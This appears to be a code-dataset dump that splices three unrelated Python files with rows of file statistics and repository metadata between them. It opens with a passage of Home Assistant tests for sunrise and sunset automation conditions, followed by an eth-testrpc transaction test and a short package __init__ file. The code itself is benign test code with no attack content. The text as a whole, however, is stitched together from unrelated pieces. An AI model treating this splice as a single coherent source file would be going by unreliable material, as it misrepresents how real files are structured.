# now = UTC midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
async def test_if_action_before_sunset_with_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunset with offset.
Before sunset is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": "sunset",
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = local midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1s + 1h -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 53, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1h -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = UTC midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = UTC midnight - 1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunrise -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunrise -1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = local midnight - 1s -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
async def test_if_action_after_sunrise_with_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunrise with offset.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s + 1h -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunrise + 1h -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 33, 58, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC noon -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 12, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC noon - 1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 11, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local noon -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 19, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local noon - 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 18, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset + 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 53, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight-1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T14:33:57.053037+00:00"},
)
async def test_if_action_after_sunset_with_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunset with offset.
After sunset is true from sunset until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": "sunset",
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunset - 1s + 1h -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1h -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
# now = midnight-1s -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T02:55:06.099767+00:00"},
)
# now = midnight -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
async def test_if_action_before_and_after_during(hass, hass_ws_client, calls):
"""
Test if action was after sunrise and before sunset.
This is true from sunrise until sunset.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"before": SUN_EVENT_SUNSET,
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": False,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = sunset + 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 17, 1, 53, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T01:53:44.723614+00:00"},
)
# now = sunrise + 1s -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = sunset - 1s -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 17, 1, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = 9AM local -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 16, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
async def test_if_action_before_sunrise_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunrise is true from midnight until sunrise, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 15, 21, 13, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = sunrise - 1h -> 'before sunrise' true
now = datetime(2015, 7, 24, 14, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-23T15:12:19.155123+00:00"},
)
async def test_if_action_after_sunrise_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunrise is true from sunrise until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunrise -> 'after sunrise' true
now = datetime(2015, 7, 24, 15, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = sunrise - 1h -> 'after sunrise' not true
now = datetime(2015, 7, 24, 14, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-23T15:12:19.155123+00:00"},
)
async def test_if_action_before_sunset_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was before sunset.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunset is true from midnight until sunset, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunset + 1s -> 'before sunset' not true
now = datetime(2015, 7, 25, 11, 13, 34, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-25T11:13:32.501837+00:00"},
)
# now = sunset - 1h-> 'before sunset' true
now = datetime(2015, 7, 25, 10, 13, 33, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-25T11:13:32.501837+00:00"},
)
# now = local midnight -> 'before sunset' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T11:17:54.446913+00:00"},
)
# now = local midnight - 1s -> 'before sunset' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-23T11:22:18.467277+00:00"},
)
async def test_if_action_after_sunset_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was after sunset.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunset is true from sunset until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunset -> 'after sunset' true
now = datetime(2015, 7, 25, 11, 13, 33, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-25T11:13:32.501837+00:00"},
)
# now = sunset - 1s -> 'after sunset' not true
now = datetime(2015, 7, 25, 11, 13, 32, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-25T11:13:32.501837+00:00"},
)
# now = local midnight -> 'after sunset' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T11:17:54.446913+00:00"},
)
# now = local midnight - 1s -> 'after sunset' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-23T11:22:18.467277+00:00"},
)
| 33.475792 | 88 | 0.558766 | 10,253 | 91,958 | 4.827465 | 0.035989 | 0.039155 | 0.029396 | 0.035276 | 0.899265 | 0.880394 | 0.860049 | 0.83631 | 0.818692 | 0.782609 | 0 | 0.059285 | 0.30316 | 91,958 | 2,746 | 89 | 33.487983 | 0.713124 | 0.06939 | 0 | 0.6385 | 0 | 0 | 0.241145 | 0.070389 | 0 | 0 | 0 | 0 | 0.11568 | 1 | 0.003615 | false | 0 | 0.005423 | 0 | 0.010845 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22db5c0efa67a48ea7ce2e5f94297c5abb19f397 | 1,530 | py | Python | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | ["MIT"] | 164 | 2016-04-20T08:30:22.000Z | 2022-01-05T07:43:12.000Z | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | ["MIT"] | 55 | 2016-06-30T20:06:56.000Z | 2019-12-12T07:36:02.000Z | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | ["MIT"] | 46 | 2016-04-27T16:28:46.000Z | 2022-01-09T17:59:09.000Z | from testrpc.client.utils import force_text
def test_eth_sendTransaction(rpc_client, accounts, hex_accounts):
result = rpc_client(
method="eth_sendTransaction",
params=[{
"from": accounts[0],
"to": accounts[1],
"value": 1234,
"data": "0x1234",
"gas": 100000,
"gasPrice": 4321,
}],
)
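# A transaction hash is 32 bytes: 64 hex characters plus the "0x" prefix gives a length of 66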
assert len(result) == 66
txn = rpc_client(
method="eth_getTransactionByHash",
params=[result],
)
assert txn['from'] == force_text(hex_accounts[0])
assert txn['to'] == force_text(hex_accounts[1])
assert txn['value'] == hex(1234)
assert txn['input'] == '0x1234'
assert txn['gas'] == hex(100000)
assert txn['gasPrice'] == hex(4321)
def test_eth_sendTransaction_with_hex_values(rpc_client, accounts, hex_accounts):
result = rpc_client(
method="eth_sendTransaction",
params=[{
"from": accounts[0],
"to": accounts[1],
"value": hex(1234),
"data": "0x1234",
"gas": hex(100000),
"gasPrice": hex(4321),
}],
)
assert len(result) == 66
txn = rpc_client(
method="eth_getTransactionByHash",
params=[result],
)
assert txn['from'] == force_text(hex_accounts[0])
assert txn['to'] == force_text(hex_accounts[1])
assert txn['value'] == hex(1234)
assert txn['input'] == '0x1234'
assert txn['gas'] == hex(100000)
assert txn['gasPrice'] == hex(4321)
| 27.818182 | 81 | 0.558824 | 167 | 1,530 | 4.952096 | 0.215569 | 0.130593 | 0.072551 | 0.087062 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0 | 0.080512 | 0.285621 | 1,530 | 54 | 82 | 28.333333 | 0.676121 | 0 | 0 | 0.723404 | 0 | 0 | 0.141176 | 0.031373 | 0 | 0 | 0.015686 | 0 | 0.297872 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a3b1bc0100bd08032aaeccff307c3bccee6e5298 | 126 | py | Python | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | ["MIT"] | 1 | 2019-08-02T09:47:11.000Z | 2019-08-02T09:47:11.000Z | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | ["MIT"] | null | null | null | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | ["MIT"] | 2 | 2020-01-04T06:13:52.000Z | 2020-01-08T04:06:08.000Z | # What an amazing python file.
from .faclass import Player
from .faclass import teamOffer
__all__ = ['Player', 'teamOffer']
